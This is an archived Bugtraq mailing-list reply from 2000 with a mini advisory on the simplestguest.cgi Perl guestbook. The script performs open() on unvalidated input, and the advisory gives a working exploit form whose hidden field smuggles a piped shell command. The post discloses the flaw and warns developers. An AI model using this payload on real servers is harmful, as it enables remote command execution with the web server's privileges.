[18056] in bugtraq
Re: Insecure input validation in simplestmail.cgi
daemon@ATHENA.MIT.EDU (suid@SNEAKERZ.ORG)
Wed Dec 13 21:02:34 2000
Message-Id: <200012130029.LAA16807@jawa.chilli.net.au>
Date: Mon, 13 Dec 0100 01:14:04 +0000
Reply-To: suid@SNEAKERZ.ORG
From: suid@SNEAKERZ.ORG
X-To: h@CKZ.ORG
To: BUGTRAQ@SECURITYFOCUS.COM
> simplestmail.cgi is another Perl cgi written by "Tammie's HUSBAND" Leif
Wright.
The whole group of "simplest" cgi's are bad. web developers: dont use them
I didnt really post this because its pretty lame but i looked at a few of these
a while back and heres something i put on my site in feburary. (which used to
be suid.edu and is now www.sneakerz.org/~suid/)
suid@sneakerz.org - mini advisory - Tammies Husband Guestbook CGI
Software: simplestguest.cgi
URL: http://www.conservatives.net/atheist/scripts/simplestguest.html
Version: Version 2
Platforms: Unix
Type: Input validation problem
Summary:
Anyone can execute any command on the remote system with
the priveleges of the web server.
Vulnerability:
The perl code does no input validation and performs an
open() on a user supplied input.
Exploit:
Build a HTML form resembling:
<form action=/cgi-bin/simplestguest.cgi method=POST>
<input type=hidden name=required value="NAME">
<input type=hidden name=guestbook
value=" | <command goes here> |">
<input type=hidden name="NAME" value="X">
<input type=submit>
</form>
Of course you could simply send this in a POST request directly
to the web server. Whatever.
http://www.sneakerz.org/~suid/
EOF
